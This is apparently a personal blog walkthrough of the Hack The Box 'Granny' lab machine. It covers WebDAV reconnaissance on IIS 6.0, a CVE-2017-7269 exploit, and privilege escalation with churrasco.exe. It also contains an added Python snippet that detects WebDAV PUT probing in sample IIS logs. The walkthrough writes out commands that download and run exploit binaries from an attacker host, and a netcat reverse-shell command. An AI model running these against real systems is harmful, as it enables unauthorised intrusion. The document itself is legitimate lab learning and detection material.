Flydragon's Blog
[HTB] Granny Walkthrough

Preface

I saw a friend writing these, so I'm following along and learning.
I've only just started with Windows pentesting and don't want to keep falling into the same pitfalls, so I'm writing write-ups of the boxes as a record XD
This box is Granny from Hack The Box, rated Easy.

Techniques used:

  1. File transfer with VBScript
  2. Privilege escalation with churrasco.exe

Attacker: 10.10.16.2
Target: 10.10.10.15

Recon

  1. nmap
sudo nmap -sV -sC 10.10.10.15
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Date: Mon, 08 Apr 2024 02:27:18 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.73 seconds

It looks like a WebDAV server, and the PUT method is allowed, so files can be uploaded.

  2. Look at the web side

From the response headers in Burp we can tell it is running on the ASP.NET framework.

  3. dirsearch
dirsearch -u http://10.10.10.15/ -r

There is some information disclosure, but nothing I could act on.

[22:45:28] 200 -  246B  - /_private/     (Added to queue)                   
[22:45:28] 301 -  153B  - /_private  ->  http://10.10.10.15/%5Fprivate/     
[22:45:28] 200 -  759B  - /_vti_bin/     (Added to queue)                   
[22:45:28] 301 -  155B  - /_vti_bin  ->  http://10.10.10.15/%5Fvti%5Fbin/
[22:45:28] 200 -    2KB - /_vti_inf.html                                    
[22:45:28] 301 -  155B  - /_vti_log  ->  http://10.10.10.15/%5Fvti%5Flog/
[22:45:28] 200 -  246B  - /_vti_log/     (Added to queue)
[22:45:28] 500 -   88B  - /_vti_cnf/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_aut/author.dll                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
[22:45:29] 500 -   88B  - /_vti_pvt/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
[22:45:29] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop                    
[22:45:29] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.dll
[22:45:40] 200 -  369B  - /aspnet_client/     (Added to queue)              
[22:45:40] 301 -  158B  - /aspnet_client  ->  http://10.10.10.15/aspnet%5Fclient/
[22:45:52] 301 -  149B  - /images  ->  http://10.10.10.15/images/     (Added to queue)
[22:45:52] 200 -  242B  - /images/
[22:46:08] 200 -    2KB - /postinfo.html

Exploit

  1. Google

Found an RCE exploit:
https://github.com/eliuha/webdav_exploit

That one didn't give me a shell, so I switched to another exploit:
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

Got a shell, but still couldn't get the user flag.

Privilege Escalation

systeminfo + Windows-Exploit-Suggester

python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo sysinfo.txt

It returns quite a few candidate routes, which can be tried one by one.

However, PowerShell can't be used to transfer files:

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.2:8000/ms15-051_x32.exe', 'ms15-051_x32.exe')"

Switching to certutil.exe doesn't work either:

certutil.exe -urlcache -split -f http://10.10.16.2:8000/ms15-051_x32.exe

But from the recon phase we know that files can be uploaded with PUT.
Use davtest to check which extensions can actually be uploaded:

davtest -url http://10.10.10.15
 Sending test files
PUT     shtml   FAIL
PUT     cgi     FAIL
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     php     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     jhtml   FAIL

Ugh, none of them work.

So VBScript it is:
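From the defender's side, the risky-method list in the nmap output above and the burst of PUT requests davtest generates both show up in the IIS W3C logs. As an added example (not code from the original post), here is detection logic run over a constructed IIS 6.0 log excerpt; the log lines, client addresses and user-agent strings are sample data, not taken from the box.

```python
import collections

# Constructed IIS 6.0 W3C extended log excerpt (sample data, not a real capture).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-04-08 02:27:18 10.10.10.15 GET / - 80 - 10.10.16.2 Mozilla/5.0 200 0 0
2024-04-08 02:27:19 10.10.10.15 OPTIONS / - 80 - 10.10.16.2 Nmap+Scripting+Engine 200 0 0
2024-04-08 02:27:20 10.10.10.15 PROPFIND / - 80 - 10.10.16.2 Nmap+Scripting+Engine 207 0 0
2024-04-08 02:31:01 10.10.10.15 PUT /DavTestDir/davtest.shtml - 80 - 10.10.16.2 dav-client 403 0 0
2024-04-08 02:31:01 10.10.10.15 PUT /DavTestDir/davtest.asp - 80 - 10.10.16.2 dav-client 403 0 0
2024-04-08 02:31:02 10.10.10.15 PUT /DavTestDir/davtest.txt - 80 - 10.10.16.2 dav-client 201 0 0
2024-04-08 02:31:02 10.10.10.15 MOVE /DavTestDir/davtest.txt - 80 - 10.10.16.2 dav-client 201 0 0
2024-04-08 02:40:00 10.10.10.15 GET /index.html - 80 - 192.0.2.7 Mozilla/5.0 200 0 0
"""

# Methods nmap flagged as "Potentially risky" on this host.
RISKY_METHODS = {"TRACE", "DELETE", "COPY", "MOVE", "PROPFIND", "PROPPATCH",
                 "SEARCH", "MKCOL", "LOCK", "UNLOCK", "PUT"}
# Subset that changes server-side content when it succeeds.
WRITE_METHODS = {"PUT", "MOVE", "COPY", "DELETE", "MKCOL", "PROPPATCH"}

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields: directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):
            yield dict(zip(fields, values))

def webdav_findings(text, put_burst=3):
    """Return (risky requests, successful writes, clients sending >= put_burst PUTs)."""
    risky, writes = [], []
    put_counts = collections.Counter()
    for rec in parse_w3c(text):
        method, status = rec["cs-method"].upper(), int(rec["sc-status"])
        if method in RISKY_METHODS:
            risky.append((rec["c-ip"], method, rec["cs-uri-stem"], status))
        if method in WRITE_METHODS and 200 <= status < 300:
            writes.append((rec["c-ip"], method, rec["cs-uri-stem"]))
        if method == "PUT":
            put_counts[rec["c-ip"]] += 1
    bursts = sorted(ip for ip, n in put_counts.items() if n >= put_burst)
    return risky, writes, bursts

if __name__ == "__main__":
    for group in webdav_findings(SAMPLE_LOG):
        print(group)
```

A 2xx on a write-class method is the line worth alerting on; the 403s still show that the client was probing for writable extensions.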

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript /nologo wget.vbs http://10.10.16.2:8000/ms15-051_x32.exe ms15-051_x32.exe
.\ms15-051_x32.exe

It hung. I hit Ctrl+C and re-sent the exploit, and after that I couldn't get a shell anymore.

Trying the candidates one by one wastes too much time, so while waiting for the box to reset I googled a bit
and found churrasco.exe:

https://github.com/Re4son/Churrasco/

Upload churrasco.exe and nc_x32.exe with the VBScript,
then use churrasco.exe to spawn a reverse shell:

churrasco.exe -d "nc_x32.exe -e cmd.exe 10.10.16.2 1234"

Privilege escalation succeeded!

Afterword

The RCE part was very straightforward; reading other people's write-ups afterwards, there are quite a few other ways to do it.
The privilege escalation part felt like being stuck in jail; old machines take some of the fun away QQ
Still, learning file transfer with VBScript and a new privesc method was worth it. A pity I didn't get to play with WebDAV much.

https://flydragonw.github.io/posts/htb_granny/
Author: FlyDragon
Published at: 2024-04-08